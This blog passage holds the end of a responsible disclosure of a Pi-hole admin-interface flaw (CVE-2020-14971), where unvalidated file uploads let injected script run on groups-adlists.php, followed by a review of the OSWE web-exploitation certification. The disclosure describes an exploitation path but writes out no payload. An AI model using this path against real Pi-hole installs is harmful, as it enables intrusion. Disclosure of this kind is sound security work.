<span style="color: #353535; font-family: inherit;"><span style="font-size: large;">The same then applied to adlists.json and other parameters in other files, as all the files were not being properly checked upon upload, they also just overwrote whatever was previously there and therefore your code executed accordingly:</span></span><br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG1GmplenHq7rmbWtRjeTy492e1QfFcnEFUSOg09i0PeB3YYgjB3H_YIvSRdQS95kC3753-do_jF3rT57gumNRc8jIoQVxRNP8CvCnRbVyKZJg99DxHLVA4VucqIFsAwtbLB1rIx_R0bGR/s1600/Screen+Shot+2020-06-22+at+10.13.18+PM.png" imageanchor="1" style="font-family: cambria; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="67" data-original-width="910" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG1GmplenHq7rmbWtRjeTy492e1QfFcnEFUSOg09i0PeB3YYgjB3H_YIvSRdQS95kC3753-do_jF3rT57gumNRc8jIoQVxRNP8CvCnRbVyKZJg99DxHLVA4VucqIFsAwtbLB1rIx_R0bGR/s640/Screen+Shot+2020-06-22+at+10.13.18+PM.png" width="640" /></a></div>
</div>
<div class="MsoNormal" style="font-family: Cambria; margin: 0in 0in 0.0001pt;">
<div class="MsoNormal" style="font-family: Cambria; margin: 0in 0in 0.0001pt;">
<br /></div>
</div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><span style="font-size: large;">Browse to host/admin/groups-adlists.php and you should get the ‘Adam popup’:</span><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkL4xhcy00Ir0k_5N5b41Wau-Azdckp9X4yqI7nqToiNy8pLw2uHLuxxgHMARkOxL-xcimS2fWjUbn35YVSQF3yPXCZplqB31krG5J2KMfL9CEMu_OvBuXDKezufBsmlSbCAnppzJaPQvO/s1600/Screen+Shot+2020-06-18+at+4.45.47+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="610" data-original-width="1264" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkL4xhcy00Ir0k_5N5b41Wau-Azdckp9X4yqI7nqToiNy8pLw2uHLuxxgHMARkOxL-xcimS2fWjUbn35YVSQF3yPXCZplqB31krG5J2KMfL9CEMu_OvBuXDKezufBsmlSbCAnppzJaPQvO/s640/Screen+Shot+2020-06-18+at+4.45.47+PM.png" width="640" /></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">There are more examples, however it’s more of the same as what has been discussed above. I would also like to mention, that the Pi-hole is an amazing piece of software, built by people who really care for the community, please support them and donate. All the responses (especially from Adam) were really quick and things were patched exceptionally quickly.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">You can browse all the fixes, comments and progress of patching by going here:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: blue; font-family: inherit; font-size: large;"><span style="color: windowtext; text-decoration: none;"><a href="https://github.com/pi-hole/AdminLTE/commit/c949516ee15fa6a9b0c8511cc4c4d6b0893f3e69" style="color: purple;">https://github.com/pi-hole/AdminLTE/commit/c949516ee15fa6a9b0c8511cc4c4d6b0893f3e69</a></span><o:p></o:p></span><br />
<span style="color: blue; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: inherit;"><span style="color: blue; font-size: large; text-decoration: none;"><a href="https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-640920508" style="color: purple;">https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-640920508</a></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="color: blue; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: inherit;"><span style="color: blue; font-size: large; text-decoration: none;"><a href="https://github.com/pi-hole/AdminLTE/commit/8f6e1365b6dec0ae1aa0b0b15b102c9133f347e5" style="color: purple;">https://github.com/pi-hole/AdminLTE/commit/8f6e1365b6dec0ae1aa0b0b15b102c9133f347e5</a></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="color: blue; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: inherit;"><span style="color: blue; font-size: large; text-decoration: none;"><a href="https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-643830404" style="color: purple;">https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-643830404</a></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="color: blue; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: inherit;"><span style="color: blue; font-size: large; text-decoration: none;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14971" style="color: purple;">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14971</a></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-54332470238344883532020-05-28T13:20:00.000+02:002020-05-28T13:20:40.819+02:00{Certification Review} - OSWE - Staff Review<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Recently, Offensive-Security released an online version of their certification called “Offensive Security Web Expert” aka OSWE. After having already experienced and successfully obtaining several other certifications from Offensive Security such as OSCP and OSCE, I was curious and intrigued to give the OSWE course a try as well.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Candara; font-size: 11pt;">I decided to choose</span><span style="font-family: Candara; font-size: 11pt;"> </span><span style="font-family: Candara; font-size: 11pt;">the 2-month package option for the course called “Advanced Web Attacks and Exploitation” and due to other commitments I was able to request and was granted a minor 15 day extension.</span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">After watching the videos and reading through the course material, I was very impressed by the content of the course, as it contained detailed information and analysis on certain in-depth attacks.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The course followed a white-box testing approach which was based on source code review, by reading the code of the web application in order to find and exploit potential vulnerabilities.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The course material included several labs with web application software installed on them and by following the content provided in the course material, exploiting the machines was relatively easy.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Before embarking on this course, I would recommend that you have a good understanding of the following skills:<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">1.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Python scripting language:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The course will require you to have a solid understanding of, as well as experience with python scripting, as it <span> </span>is used for automating the process of exploiting vulnerabilities as well as automating exploits. <o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">2.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Other programming languages:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">It is also very important to have basic knowledge and understanding of other programming languages such as C#, JavaScript and Java.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">3.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Prior experience with web application attacks:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Prior experience with web application attacks will also be very advantageous as you will be required to have strong knowledge and understanding of common modern web attacks. Personally, I would also highly recommend reading the book titled “Web Application Hacker’s Handbook” <span> </span>beforehand as its content will be very helpful during the course and thereafter.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">4.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Source code review:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">One of the outcomes that this course will teach you is how to do Whitebox testing on web applications by reviewing and understanding the code of the application. Therefore, prior experience in doing source code review on web applications will be advantageous.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">5.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Web development experience:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Having prior experience with web development and the workings of web applications will also assist with successfully completing this course.</span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<h2>
<b><u><span lang="EN-US" style="font-family: Candara;">Course Overview:</span></u></b></h2>
<div>
<b><u><span lang="EN-US" style="font-family: Candara;"><br /></span></u></b></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">After receiving the course materials, I began reading the book, watching videos and solving the exercises and milestones. <o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The first few chapters of the course were relatively basic but from Chapter 4 onwards it became far more advanced. Personally it was at this point that it really became fun, as the course delved deeper into <span> </span>advanced techniques and attacks types.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Offensive Security recommends that you try and solve the exercises and milestones <span> </span>as you progress through the chapters to ensure that you get a better grasp and understanding of the materials and also as proof that you have understood everything in that particular chapter.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Listed below, is a list of pros and cons to consider when deciding to take this course:<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-bidi-font-weight: bold; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">PROS:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 56.25pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><span lang="EN-US" style="font-family: Candara;">Great for learning and advancing white box testing and source code review skills.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 56.25pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><span lang="EN-US" style="font-family: Candara;">The course covers advanced real-world vulnerabilities such as deserialization attacks and advanced techniques.</span><span style="font-family: Candara; font-size: 11pt; text-indent: 0px;"> </span></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 56.25pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><span lang="EN-US" style="font-family: Candara;">The course covers a wide range of vulnerabilities and exploits, including medium, high and critical risk.</span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-bidi-font-weight: bold; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">CONS:</span></b></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><span style="font-family: Candara;"><b> </b></span></span><span lang="EN-US" style="font-family: "Courier New"; font-size: 11pt; text-indent: -0.25in;">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">Although the course covers many different attack types, there are a few that are not covered in the course, for example, XXE, SSRF, CSRF and SSTI.</span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo2; text-indent: -.25in;">
<span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><span style="font-family: Candara;"> </span></span><span lang="EN-US" style="font-family: "Courier New"; font-size: 11pt; text-indent: -0.25in;">o<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">More exercise work and milestones would be advantageous to learners</span><span style="font-family: Candara; font-size: 11pt; text-indent: 0px;"> </span></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -.25in;">
<span style="font-family: Candara; font-size: 11pt; text-indent: 0px;"><br /></span></div>
<h2>
<b><u><span lang="EN-US" style="font-family: Candara;">The lab review:</span></u></b></h2>
<div>
<b><u><span lang="EN-US" style="font-family: Candara;"><br /></span></u></b></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The lab consisted of 5 machines <span> </span>which contained the web applications as discussed in the course material. Therefore, by going through the course material comprehensivly and successfully completing the course exercises and milestones, you should be able to successfully execute the necessary attacks and exploitation paths.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Personally, I would recommend practicing as much as possible before moving onto the exam, as this will help increase your skills and confidence.</span><span style="font-family: Candara; font-size: 11pt;"> </span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Candara; font-size: 11pt;"><br /></span></div>
<h2>
<b><u><span lang="EN-US" style="font-family: Candara;">The exam review:</span></u></b></h2>
<div>
<b><u><span lang="EN-US" style="font-family: Candara;"><br /></span></u></b></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The exam for the OSWE course is a 48 hour exam, which includes an additional 24 hours for writing your step by step report of the exam. As with all exams, I would recommend that you ensure that you get enough sleep to ensure that you are well rested and able to perform at your peak. </span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
